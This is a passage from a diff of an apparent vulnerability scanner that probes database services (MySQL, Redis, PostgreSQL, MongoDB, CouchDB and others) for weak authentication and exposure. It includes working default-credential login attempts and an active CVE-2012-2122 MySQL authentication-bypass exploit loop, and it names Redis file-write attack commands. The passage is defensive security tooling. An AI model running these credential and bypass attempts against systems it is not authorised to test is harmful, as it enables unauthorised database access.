pkt_payload = data[4:] + if not pkt_payload or pkt_payload[0] != 0x0a: + sock.close() + continue + + # Extract salt (scramble) from handshake + parts = pkt_payload[1:].split(b'\x00', 1) + rest = parts[1] if len(parts) > 1 else b'' + # Salt part 1: bytes 4..11 after capabilities (skip 4 bytes capabilities + 1 byte filler) + if len(rest) >= 13: + salt1 = rest[5:13] + else: + sock.close() + continue + # Salt part 2: after reserved bytes (skip 2+2+1+10 reserved = 15) + salt2 = b'' + if len(rest) >= 28: + salt2 = rest[28:40].rstrip(b'\x00') + salt = salt1 + salt2 + + # mysql_native_password auth response + if password: + sha1_pass = hashlib.sha1(password.encode()).digest() + sha1_sha1 = hashlib.sha1(sha1_pass).digest() + sha1_salt_sha1sha1 = hashlib.sha1(salt + sha1_sha1).digest() + auth_data = bytes(a ^ b for a, b in zip(sha1_pass, sha1_salt_sha1sha1)) + else: + auth_data = b'' + + # Build auth response packet + client_flags = struct.pack('= 5: + resp_type = resp[4] + if resp_type == 0x00: # OK packet + cred_str = f"{username}:{password}" if password else f"{username}:(empty)" + raw["accepted_credentials"].append(cred_str) + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"MySQL default credential accepted: {cred_str}", + description=f"MySQL on {target}:{port} accepts {cred_str}.", + evidence=f"Auth response OK for {cred_str}", + remediation="Change default passwords and restrict access.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + except Exception: + continue + + if not findings: + findings.append(Finding( + severity=Severity.INFO, + title="MySQL default credentials rejected", + description=f"Tested {raw['tested_credentials']} credential pairs, all rejected.", + confidence="certain", + )) + + # --- CVE-2012-2122 auth bypass test --- + # Affected: MySQL 5.1.x < 5.1.63, 5.5.x < 5.5.25, MariaDB < 5.5.23 + # Bug: memcmp return value truncation means ~1/256 chance of auth bypass + cve_bypass = self._mysql_test_cve_2012_2122(target, port) + if cve_bypass: + findings.append(cve_bypass) + raw["cve_2012_2122"] = True + + return probe_result(raw_data=raw, findings=findings) + + # Affected version ranges for CVE-2012-2122 + _MYSQL_CVE_2012_2122_RANGES = [ + ((5, 1, 0), (5, 1, 63)), # MySQL 5.1.x < 5.1.63 + ((5, 5, 0), (5, 5, 25)), # MySQL 5.5.x < 5.5.25 + ] + + def _mysql_test_cve_2012_2122(self, target, port): + """Test for MySQL CVE-2012-2122 timing-based authentication bypass. + + On affected versions, memcmp() return value is cast to char, giving + a ~1/256 chance that any password is accepted. 300 attempts gives + ~69% probability of detection. + + Returns + ------- + Finding or None + CRITICAL finding if bypass confirmed, None otherwise. + """ + import hashlib + import random + + # First, connect to get version + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + data = sock.recv(256) + sock.close() + except Exception: + return None + + if not data or len(data) < 5: + return None + pkt_payload = data[4:] + if not pkt_payload or pkt_payload[0] != 0x0a: + return None + + version_str = pkt_payload[1:].split(b'\x00')[0].decode('utf-8', errors='ignore') + version_tuple = tuple(int(x) for x in _re.findall(r'\d+', version_str)[:3]) + if len(version_tuple) < 3: + return None + + # Check if version is in affected range + affected = False + for low, high in self._MYSQL_CVE_2012_2122_RANGES: + if low <= version_tuple < high: + affected = True + break + if not affected: + return None + + # Attempt rapid auth with random passwords + self.P(f"MySQL {version_str} in CVE-2012-2122 range — testing auth bypass ({target}:{port})", color='y') + attempts = 300 + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(5) + sock.connect((target, port)) + + for _ in range(attempts): + # Read handshake + data = sock.recv(512) + if not data or len(data) < 5: + break + pkt_payload = data[4:] + if not pkt_payload or pkt_payload[0] != 0x0a: + break + + # Extract salt + parts = pkt_payload[1:].split(b'\x00', 1) + rest = parts[1] if len(parts) > 1 else b'' + if len(rest) < 13: + break + salt1 = rest[5:13] + salt2 = rest[28:40].rstrip(b'\x00') if len(rest) >= 28 else b'' + salt = salt1 + salt2 + + # Auth with random password + rand_pass = random.randbytes(20) + sha1_pass = hashlib.sha1(rand_pass).digest() + sha1_sha1 = hashlib.sha1(sha1_pass).digest() + sha1_salt = hashlib.sha1(salt + sha1_sha1).digest() + auth_data = bytes(a ^ b for a, b in zip(sha1_pass, sha1_salt)) + + client_flags = struct.pack('= 5 and resp[4] == 0x00: + sock.close() + return Finding( + severity=Severity.CRITICAL, + title=f"MySQL authentication bypass confirmed (CVE-2012-2122)", + description=f"MySQL {version_str} on {target}:{port} accepted login with a random password " + "due to CVE-2012-2122 memcmp truncation bug. Any attacker can gain root access.", + evidence=f"Auth succeeded with random password on attempt (version {version_str})", + remediation="Upgrade MySQL to at least 5.1.63 / 5.5.25 / MariaDB 5.5.23.", + owasp_id="A07:2021", + cwe_id="CWE-305", + confidence="certain", + ) + + # If error packet, server closes connection — reconnect + if resp and len(resp) >= 5 and resp[4] == 0xFF: + sock.close() + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + + sock.close() + except Exception: + pass + return None + + # SAFETY: Read-only commands only. NEVER add CONFIG SET, SLAVEOF, MODULE LOAD, EVAL, DEBUG. + def _service_info_redis(self, target, port): # default port: 6379 + """ + Deep Redis probe: auth check, version, config readability, data size, client list. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings, raw = [], {"version": None, "os": None, "config_writable": False} + sock = self._redis_connect(target, port) + if not sock: + return probe_error(target, port, "Redis", Exception("connection failed")) + + auth_findings = self._redis_check_auth(sock, raw) + if not auth_findings: + # NOAUTH response — requires auth, stop here + sock.close() + return probe_result( + raw_data=raw, + findings=[Finding(Severity.INFO, "Redis requires authentication", "PING returned NOAUTH.")], + ) + + findings += auth_findings + findings += self._redis_check_info(sock, raw) + findings += self._redis_check_config(sock, raw) + findings += self._redis_check_data(sock, raw) + findings += self._redis_check_clients(sock, raw) + findings += self._redis_check_persistence(sock, raw) + + # CVE check + if raw["version"]: + findings += check_cves("redis", raw["version"]) + + sock.close() + return probe_result(raw_data=raw, findings=findings) + + def _redis_connect(self, target, port): + """Open a TCP socket to Redis.""" + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + return sock + except Exception as e: + self.P(f"Redis connect failed on {target}:{port}: {e}", color='y') + return None + + def _redis_cmd(self, sock, cmd): + """Send an inline Redis command and return the response string.""" + try: + sock.sendall(f"{cmd}\r\n".encode()) + data = sock.recv(4096).decode('utf-8', errors='ignore') + return data + except Exception: + return "" + + def _redis_check_auth(self, sock, raw): + """PING to check if auth is required. Returns findings if no auth, empty list if NOAUTH.""" + resp = self._redis_cmd(sock, "PING") + if resp.startswith("+PONG"): + return [Finding( + severity=Severity.CRITICAL, + title="Redis unauthenticated access", + description="Redis responded to PING without authentication.", + evidence=f"Response: {resp.strip()[:80]}", + remediation="Set a strong password via requirepass in redis.conf.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )] + if "-NOAUTH" in resp.upper(): + return [] # signal: auth required + return [Finding( + severity=Severity.LOW, + title="Redis unusual PING response", + description=f"Unexpected response: {resp.strip()[:80]}", + confidence="tentative", + )] + + def _redis_check_info(self, sock, raw): + """Extract version and OS from INFO server.""" + findings = [] + resp = self._redis_cmd(sock, "INFO server") + if resp.startswith("-"): + return findings + uptime_seconds = None + for line in resp.split("\r\n"): + if line.startswith("redis_version:"): + raw["version"] = line.split(":", 1)[1].strip() + elif line.startswith("os:"): + raw["os"] = line.split(":", 1)[1].strip() + elif line.startswith("uptime_in_seconds:"): + try: + uptime_seconds = int(line.split(":", 1)[1].strip()) + raw["uptime_seconds"] = uptime_seconds + except (ValueError, IndexError): + pass + if raw["os"]: + self._emit_metadata("os_claims", "redis", raw["os"]) + if raw["version"]: + findings.append(Finding( + severity=Severity.LOW, + title=f"Redis version disclosed: {raw['version']}", + description=f"Redis {raw['version']} on {raw['os'] or 'unknown OS'}.", + evidence=f"version={raw['version']}, os={raw['os']}", + remediation="Restrict INFO command access or rename it.", + confidence="certain", + )) + if uptime_seconds is not None and uptime_seconds < 60: + findings.append(Finding( + severity=Severity.INFO, + title=f"Redis uptime <60s ({uptime_seconds}s) — possible container restart", + description="Very low uptime may indicate a recently restarted container or ephemeral instance.", + evidence=f"uptime_in_seconds={uptime_seconds}", + remediation="Investigate if the service is being automatically restarted.", + confidence="tentative", + )) + return findings + + def _redis_check_config(self, sock, raw): + """CONFIG GET dir — if accessible, it's an RCE vector.""" + findings = [] + resp = self._redis_cmd(sock, "CONFIG GET dir") + if resp.startswith("-"): + return findings # blocked, good + raw["config_writable"] = True + findings.append(Finding( + severity=Severity.CRITICAL, + title="Redis CONFIG command accessible (RCE vector)", + description="CONFIG GET is accessible, allowing attackers to write arbitrary files " + "via CONFIG SET dir / CONFIG SET dbfilename + SAVE.", + evidence=f"CONFIG GET dir response: {resp.strip()[:120]}", + remediation="Rename or disable CONFIG via rename-command in redis.conf.", + owasp_id="A05:2021", + cwe_id="CWE-94", + confidence="certain", + )) + return findings + + def _redis_check_data(self, sock, raw): + """DBSIZE — report if data is present.""" + findings = [] + resp = self._redis_cmd(sock, "DBSIZE") + if resp.startswith(":"): + try: + count = int(resp.strip().lstrip(":")) + raw["db_size"] = count + if count > 0: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"Redis database contains {count} keys", + description="Unauthenticated access to a Redis instance with live data.", + evidence=f"DBSIZE={count}", + remediation="Enable authentication and restrict network access.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except ValueError: + pass + return findings + + def _redis_check_clients(self, sock, raw): + """CLIENT LIST — extract connected client IPs.""" + findings = [] + resp = self._redis_cmd(sock, "CLIENT LIST") + if resp.startswith("-"): + return findings + ips = set() + for line in resp.split("\n"): + for part in line.split(): + if part.startswith("addr="): + ip_port = part.split("=", 1)[1] + ip = ip_port.rsplit(":", 1)[0] + ips.add(ip) + if ips: + raw["connected_clients"] = list(ips) + findings.append(Finding( + severity=Severity.LOW, + title=f"Redis client IPs disclosed ({len(ips)} clients)", + description=f"CLIENT LIST reveals connected IPs: {', '.join(sorted(ips)[:5])}", + evidence=f"IPs: {', '.join(sorted(ips)[:10])}", + remediation="Rename or disable CLIENT command.", + confidence="certain", + )) + return findings + + def _redis_check_persistence(self, sock, raw): + """Check INFO persistence for missing or stale RDB saves.""" + findings = [] + resp = self._redis_cmd(sock, "INFO persistence") + if resp.startswith("-"): + return findings + import time as _time + for line in resp.split("\r\n"): + if line.startswith("rdb_last_bgsave_time:"): + try: + ts = int(line.split(":", 1)[1].strip()) + if ts == 0: + findings.append(Finding( + severity=Severity.LOW, + title="Redis has never performed an RDB save", + description="rdb_last_bgsave_time is 0, meaning no background save has ever been performed. " + "This may indicate a cache-only instance with persistence disabled, or an ephemeral deployment.", + evidence="rdb_last_bgsave_time=0", + remediation="Verify whether RDB persistence is intentionally disabled; if not, configure BGSAVE.", + cwe_id="CWE-345", + confidence="tentative", + )) + elif (_time.time() - ts) > 365 * 86400: + age_days = int((_time.time() - ts) / 86400) + findings.append(Finding( + severity=Severity.LOW, + title=f"Redis RDB save is stale ({age_days} days old)", + description="The last RDB background save timestamp is over 1 year old. " + "This may indicate disabled persistence, a long-running cache-only instance, or stale data.", + evidence=f"rdb_last_bgsave_time={ts}, age={age_days}d", + remediation="Verify persistence configuration; stale saves may indicate data loss risk.", + cwe_id="CWE-345", + confidence="tentative", + )) + except (ValueError, IndexError): + pass + break + return findings + + + def _service_info_mssql(self, target, port): # default port: 1433 + """ + Send a TDS prelogin probe to expose SQL Server version data. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + prelogin = bytes.fromhex( + "1201001600000000000000000000000000000000000000000000000000000000" + ) + sock.sendall(prelogin) + data = sock.recv(256) + if data: + readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) + raw["banner"] = f"MSSQL prelogin response: {readable.strip()[:80]}" + findings.append(Finding( + severity=Severity.MEDIUM, + title="MSSQL prelogin handshake succeeded", + description=f"SQL Server on {target}:{port} responds to TDS prelogin, " + "exposing version metadata and confirming the service is reachable.", + evidence=f"Prelogin response: {readable.strip()[:80]}", + remediation="Restrict SQL Server access to trusted networks; use firewall rules.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="certain", + )) + sock.close() + except Exception as e: + return probe_error(target, port, "MSSQL", e) + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_postgresql(self, target, port): # default port: 5432 + """ + Probe PostgreSQL authentication method and extract server version. + + Sends a v3 StartupMessage for user 'postgres'. The server replies with + an authentication request (type 'R') optionally followed by ParameterStatus + messages (type 'S') that include ``server_version``. + + Auth codes: + 0 = AuthenticationOk (trust auth) → CRITICAL + 3 = CleartextPassword → MEDIUM + 5 = MD5Password → INFO (adequate, prefer SCRAM) + 10 = SASL (SCRAM-SHA-256) → INFO (strong) + """ + findings = [] + raw = {"auth_type": None, "version": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + payload = b'user\x00postgres\x00database\x00postgres\x00\x00' + startup = struct.pack('!I', len(payload) + 8) + struct.pack('!I', 196608) + payload + sock.sendall(startup) + # Read enough to get auth response + parameter status messages + data = b"" + try: + while len(data) < 4096: + chunk = sock.recv(4096) + if not chunk: + break + data += chunk + # Stop after we see auth request — parameters come after for trust auth + # but for password auth the server sends R then waits. + if len(data) >= 9 and data[0:1] == b'R': + auth_code = struct.unpack('!I', data[5:9])[0] + if auth_code != 0: + break # Server wants a password — no more data coming + except (socket.timeout, OSError): + pass + sock.close() + + # --- Extract version from ParameterStatus ('S') messages --- + # Format: 'S' + int32 length + key\0 + value\0 + pg_version = None + pos = 0 + while pos < len(data) - 5: + msg_type = data[pos:pos+1] + if msg_type not in (b'R', b'S', b'K', b'Z', b'E', b'N'): + break + msg_len = struct.unpack('!I', data[pos+1:pos+5])[0] + msg_end = pos + 1 + msg_len + if msg_type == b'S' and msg_end <= len(data): + kv = data[pos+5:msg_end] + parts = kv.split(b'\x00') + if len(parts) >= 2: + key = parts[0].decode('utf-8', errors='ignore') + val = parts[1].decode('utf-8', errors='ignore') + if key == 'server_version': + pg_version = val + raw["version"] = pg_version + pos = msg_end + if pos >= len(data): + break + + # --- Parse auth response --- + if len(data) >= 9 and data[0:1] == b'R': + auth_code = struct.unpack('!I', data[5:9])[0] + raw["auth_type"] = auth_code + if auth_code == 0: + findings.append(Finding( + severity=Severity.CRITICAL, + title="PostgreSQL trust authentication (no password)", + description=f"PostgreSQL on {target}:{port} accepts connections without any password (auth code 0).", + evidence=f"Auth response code: {auth_code}", + remediation="Configure pg_hba.conf to require password or SCRAM authentication.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + elif auth_code == 3: + findings.append(Finding( + severity=Severity.MEDIUM, + title="PostgreSQL cleartext password authentication", + description=f"PostgreSQL on {target}:{port} requests cleartext passwords.", + evidence=f"Auth response code: {auth_code}", + remediation="Switch to SCRAM-SHA-256 authentication in pg_hba.conf.", + owasp_id="A02:2021", + cwe_id="CWE-319", + confidence="certain", + )) + elif auth_code == 5: + findings.append(Finding( + severity=Severity.INFO, + title="PostgreSQL MD5 authentication", + description="MD5 password auth is adequate but SCRAM-SHA-256 is preferred.", + evidence=f"Auth response code: {auth_code}", + remediation="Consider upgrading to SCRAM-SHA-256.", + confidence="certain", + )) + elif auth_code == 10: + findings.append(Finding( + severity=Severity.INFO, + title="PostgreSQL SASL/SCRAM authentication", + description="Strong authentication (SCRAM-SHA-256) is in use.", + evidence=f"Auth response code: {auth_code}", + confidence="certain", + )) + elif b'AuthenticationCleartextPassword' in data: + raw["auth_type"] = "cleartext_text" + findings.append(Finding( + severity=Severity.MEDIUM, + title="PostgreSQL cleartext password authentication", + description=f"PostgreSQL on {target}:{port} requests cleartext passwords.", + evidence="Text response contained AuthenticationCleartextPassword", + remediation="Switch to SCRAM-SHA-256 authentication.", + owasp_id="A02:2021", + cwe_id="CWE-319", + confidence="firm", + )) + elif b'AuthenticationOk' in data: + raw["auth_type"] = "ok_text" + findings.append(Finding( + severity=Severity.CRITICAL, + title="PostgreSQL trust authentication (no password)", + description=f"PostgreSQL on {target}:{port} accepted connection without authentication.", + evidence="Text response contained AuthenticationOk", + remediation="Configure pg_hba.conf to require password authentication.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="firm", + )) + + # --- Version disclosure --- + if pg_version: + findings.append(Finding( + severity=Severity.LOW, + title=f"PostgreSQL version disclosed: {pg_version}", + description=f"PostgreSQL on {target}:{port} reports version {pg_version}.", + evidence=f"server_version parameter: {pg_version}", + remediation="Restrict network access to the PostgreSQL port.", + cwe_id="CWE-200", + confidence="certain", + )) + # Extract numeric version for CVE matching + ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', pg_version) + if ver_match: + for f in check_cves("postgresql", ver_match.group(1)): + findings.append(f) + + if not findings: + findings.append(Finding(Severity.INFO, "PostgreSQL probe completed", "No auth weakness detected.")) + except Exception as e: + return probe_error(target, port, "PostgreSQL", e) + + return probe_result(raw_data=raw, findings=findings) + + def _service_info_postgresql_creds(self, target, port): # default port: 5432 + """ + PostgreSQL default credential testing (opt-in via active_auth feature group). + + Attempts cleartext password auth with common defaults. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"tested_credentials": 0, "accepted_credentials": []} + creds = [("postgres", ""), ("postgres", "postgres"), ("postgres", "password")] + + for username, password in creds: + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + payload = f'user\x00{username}\x00database\x00postgres\x00\x00'.encode() + startup = struct.pack('!I', len(payload) + 8) + struct.pack('!I', 196608) + payload + sock.sendall(startup) + data = sock.recv(128) + + if len(data) >= 9 and data[0:1] == b'R': + auth_code = struct.unpack('!I', data[5:9])[0] + if auth_code == 0: + cred_str = f"{username}:(empty)" if not password else f"{username}:{password}" + raw["accepted_credentials"].append(cred_str) + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"PostgreSQL trust auth for {username}", + description=f"No password required for user {username}.", + evidence=f"Auth code 0 for {cred_str}", + remediation="Configure pg_hba.conf to require authentication.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + elif auth_code == 3: + # Send cleartext password + pwd_bytes = password.encode() + b'\x00' + pwd_msg = b'p' + struct.pack('!I', len(pwd_bytes) + 4) + pwd_bytes + sock.sendall(pwd_msg) + resp = sock.recv(4096) + if resp and resp[0:1] == b'R' and len(resp) >= 9: + result_code = struct.unpack('!I', resp[5:9])[0] + if result_code == 0: + cred_str = f"{username}:{password}" if password else f"{username}:(empty)" + raw["accepted_credentials"].append(cred_str) + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"PostgreSQL default credential accepted: {cred_str}", + description=f"Cleartext password auth accepted for {cred_str}.", + evidence=f"Auth OK for {cred_str}", + remediation="Change default passwords.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + findings += self._pg_extract_version_findings(resp) + elif auth_code == 5 and len(data) >= 13: + # MD5 auth: server sends 4-byte salt at bytes 9:13 + import hashlib + salt = data[9:13] + inner = hashlib.md5(password.encode() + username.encode()).hexdigest() + outer = 'md5' + hashlib.md5(inner.encode() + salt).hexdigest() + pwd_bytes = outer.encode() + b'\x00' + pwd_msg = b'p' + struct.pack('!I', len(pwd_bytes) + 4) + pwd_bytes + sock.sendall(pwd_msg) + resp = sock.recv(4096) + if resp and resp[0:1] == b'R' and len(resp) >= 9: + result_code = struct.unpack('!I', resp[5:9])[0] + if result_code == 0: + cred_str = f"{username}:{password}" if password else f"{username}:(empty)" + raw["accepted_credentials"].append(cred_str) + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"PostgreSQL default credential accepted: {cred_str}", + description=f"MD5 password auth accepted for {cred_str}.", + evidence=f"Auth OK for {cred_str}", + remediation="Change default passwords.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + findings += self._pg_extract_version_findings(resp) + raw["tested_credentials"] += 1 + sock.close() + except Exception: + continue + + if not findings: + findings.append(Finding( + severity=Severity.INFO, + title="PostgreSQL default credentials rejected", + description=f"Tested {raw['tested_credentials']} credential pairs.", + confidence="certain", + )) + + return probe_result(raw_data=raw, findings=findings) + + def _pg_extract_version_findings(self, data): + """Parse ParameterStatus messages after PG auth success for version + CVEs.""" + findings = [] + pos = 0 + while pos < len(data) - 5: + msg_type = data[pos:pos+1] + if msg_type not in (b'R', b'S', b'K', b'Z', b'E', b'N'): + break + msg_len = struct.unpack('!I', data[pos+1:pos+5])[0] + msg_end = pos + 1 + msg_len + if msg_type == b'S' and msg_end <= len(data): + kv = data[pos+5:msg_end] + parts = kv.split(b'\x00') + if len(parts) >= 2: + key = parts[0].decode('utf-8', errors='ignore') + val = parts[1].decode('utf-8', errors='ignore') + if key == 'server_version': + findings.append(Finding( + severity=Severity.LOW, + title=f"PostgreSQL version disclosed: {val}", + description=f"PostgreSQL reports version {val} (via authenticated session).", + evidence=f"server_version parameter: {val}", + remediation="Restrict network access to the PostgreSQL port.", + cwe_id="CWE-200", + confidence="certain", + )) + ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', val) + if ver_match: + findings += check_cves("postgresql", ver_match.group(1)) + break + pos = msg_end + if pos >= len(data): + break + return findings + + def _service_info_memcached(self, target, port): # default port: 11211 + """ + Issue Memcached stats command to detect unauthenticated access. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(2) + sock.connect((target, port)) + + # Extract version + sock.sendall(b'version\r\n') + ver_data = sock.recv(64).decode("utf-8", errors="replace").strip() + ver_match = _re.match(r'VERSION\s+(\d+(?:\.\d+)+)', ver_data) + if ver_match: + raw["version"] = ver_match.group(1) + findings.append(Finding( + severity=Severity.LOW, + title=f"Memcached version disclosed: {raw['version']}", + description=f"Memcached on {target}:{port} reveals version via VERSION command.", + evidence=f"VERSION {raw['version']}", + remediation="Restrict access to memcached to trusted networks.", + cwe_id="CWE-200", + confidence="certain", + )) + findings += check_cves("memcached", raw["version"]) + + sock.sendall(b'stats\r\n') + data = sock.recv(128) + if data.startswith(b'STAT'): + raw["banner"] = data.decode("utf-8", errors="replace").strip()[:120] + findings.append(Finding( + severity=Severity.HIGH, + title="Memcached stats accessible without authentication", + description=f"Memcached on {target}:{port} responds to stats without authentication, " + "exposing cache metadata and enabling cache poisoning or data exfiltration.", + evidence=f"stats command returned: {raw['banner'][:80]}", + remediation="Bind Memcached to localhost or use SASL authentication; restrict network access.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + else: + raw["banner"] = "Memcached port open" + findings.append(Finding( + severity=Severity.INFO, + title="Memcached port open", + description=f"Memcached port {port} is open on {target} but stats command was not accepted.", + evidence=f"Response: {data[:60].decode('utf-8', errors='replace')}", + confidence="firm", + )) + sock.close() + except Exception as e: + return probe_error(target, port, "Memcached", e) + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_mongodb(self, target, port): # default port: 27017 + """ + Attempt MongoDB isMaster + buildInfo to detect unauthenticated access + and extract the server version for CVE matching. + """ + findings = [] + raw = {"banner": None, "version": None} + try: + # --- Pass 1: isMaster --- + is_master = False + data = self._mongodb_query(target, port, b'isMaster') + if data and (b'ismaster' in data or b'isMaster' in data): + is_master = True + + if is_master: + raw["banner"] = "MongoDB isMaster response" + findings.append(Finding( + severity=Severity.CRITICAL, + title="MongoDB unauthenticated access (isMaster responded)", + description=f"MongoDB on {target}:{port} accepts commands without authentication, " + "allowing full database read/write access.", + evidence="isMaster command succeeded without credentials.", + remediation="Enable MongoDB authentication (--auth) and bind to localhost or trusted networks.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + + # --- Pass 2: buildInfo (for version) --- + build_data = self._mongodb_query(target, port, b'buildInfo') + mongo_version = self._mongodb_extract_bson_string(build_data, b'version') + if mongo_version: + raw["version"] = mongo_version + findings.append(Finding( + severity=Severity.LOW, + title=f"MongoDB version disclosed: {mongo_version}", + description=f"MongoDB on {target}:{port} reports version {mongo_version}.", + evidence=f"buildInfo version: {mongo_version}", + remediation="Restrict network access to the MongoDB port.", + cwe_id="CWE-200", + confidence="certain", + )) + ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', mongo_version) + if ver_match: + for f in check_cves("mongodb", ver_match.group(1)): + findings.append(f) + + except Exception as e: + return probe_error(target, port, "MongoDB", e) + return probe_result(raw_data=raw, findings=findings) + + @staticmethod + def _mongodb_query(target, port, command_name): + """Send a MongoDB OP_QUERY command and return the raw response bytes.""" + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + # Build BSON: {: 1} + field = b'\x10' + command_name + b'\x00' + struct.pack(' len(data): + return None + str_len = struct.unpack(' len(data): + return None + return data[str_start+4:str_start+4+str_len-1].decode('utf-8', errors='ignore') + + + + # ── CouchDB ────────────────────────────────────────────────────── + + def _service_info_couchdb(self, target, port): # default port: 5984 + """ + Probe Apache CouchDB HTTP API for unauthenticated access, admin panel, + database listing, and version-based CVE matching. + """ + findings, raw = [], {"version": None} + base_url = f"http://{target}:{port}" + + # 1. Root endpoint — identifies CouchDB and extracts version + try: + resp = requests.get(base_url, timeout=3) + if not resp.ok: + return None + data = resp.json() + if "couchdb" not in str(data).lower(): + return None # Not CouchDB + raw["version"] = data.get("version") + raw["vendor"] = data.get("vendor", {}).get("name") if isinstance(data.get("vendor"), dict) else None + except Exception: + return None + + if raw["version"]: + findings.append(Finding( + severity=Severity.LOW, + title=f"CouchDB version disclosed: {raw['version']}", + description=f"CouchDB on {target}:{port} reports version {raw['version']}.", + evidence=f"GET / → version={raw['version']}", + remediation="Restrict network access to the CouchDB port.", + cwe_id="CWE-200", + confidence="certain", + )) + ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', raw["version"]) + if ver_match: + findings += check_cves("couchdb", ver_match.group(1)) + + # 2. Database listing — unauthenticated access to /_all_dbs + try: + resp = requests.get(f"{base_url}/_all_dbs", timeout=3) + if resp.ok: + dbs = resp.json() + if isinstance(dbs, list): + raw["databases"] = dbs + user_dbs = [d for d in dbs if not d.startswith("_")] + findings.append(Finding( + severity=Severity.CRITICAL if user_dbs else Severity.HIGH, + title=f"CouchDB unauthenticated database listing ({len(dbs)} databases)", + description=f"/_all_dbs accessible without credentials. " + f"{'User databases exposed: ' + ', '.join(user_dbs[:5]) if user_dbs else 'Only system databases found.'}", + evidence=f"Databases: {', '.join(dbs[:10])}" + (f"... (+{len(dbs)-10} more)" if len(dbs) > 10 else ""), + remediation="Enable CouchDB authentication via [admins] section in local.ini.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except Exception: + pass + + # 3. Admin panel (Fauxton) accessibility + try: + resp = requests.get(f"{base_url}/_utils/", timeout=3, allow_redirects=True) + if resp.ok and ("fauxton" in resp.text.lower() or "couchdb" in resp.text.lower()): + findings.append(Finding( + severity=Severity.HIGH, + title="CouchDB admin panel (Fauxton) accessible", + description=f"/_utils/ on {target}:{port} serves the admin web interface.", + evidence=f"GET /_utils/ returned {resp.status_code}, content-length={len(resp.text)}", + remediation="Restrict access to /_utils via reverse proxy or bind to localhost.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except Exception: + pass + + # 4. Config endpoint — critical if accessible + try: + resp = requests.get(f"{base_url}/_node/_local/_config", timeout=3) + if resp.ok and resp.text.startswith("{"): + findings.append(Finding( + severity=Severity.CRITICAL, + title="CouchDB configuration exposed without authentication", + description="/_node/_local/_config returns full server configuration including credentials.", + evidence=f"GET /_node/_local/_config returned {resp.status_code}", + remediation="Enable admin authentication immediately.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except Exception: + pass + + if not findings: + findings.append(Finding(Severity.INFO, "CouchDB probe clean", "No issues detected.")) + return probe_result(raw_data=raw, findings=findings) + + # ── InfluxDB ──────────────────────────────────────────────────── + + def _service_info_influxdb(self, target, port): # default port: 8086 + """ + Probe InfluxDB HTTP API for version disclosure, unauthenticated access, + and database listing. + """ + findings, raw = [], {"version": None} + base_url = f"http://{target}:{port}" + + # 1. Ping — extract version from X-Influxdb-Version header + try: + resp = requests.get(f"{base_url}/ping", timeout=3) + version = resp.headers.get("X-Influxdb-Version") + if not version: + return None # Not InfluxDB + raw["version"] = version + findings.append(Finding( + severity=Severity.LOW, + title=f"InfluxDB version disclosed: {version}", + description=f"InfluxDB on {target}:{port} reports version {version}.", + evidence=f"X-Influxdb-Version: {version}", + remediation="Restrict network access to the InfluxDB port.", + cwe_id="CWE-200", + confidence="certain", + )) + ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', version) + if ver_match: + findings += check_cves("influxdb", ver_match.group(1)) + except Exception: + return None + + # 2. Unauthenticated database listing + try: + resp = requests.get(f"{base_url}/query", params={"q": "SHOW DATABASES"}, timeout=3) + if resp.ok: + data = resp.json() + results = data.get("results", []) + if results and not results[0].get("error"): + series = results[0].get("series", []) + db_names = [] + for s in series: + for row in s.get("values", []): + if row: + db_names.append(row[0]) + raw["databases"] = db_names + user_dbs = [d for d in db_names if d not in ("_internal",)] + findings.append(Finding( + 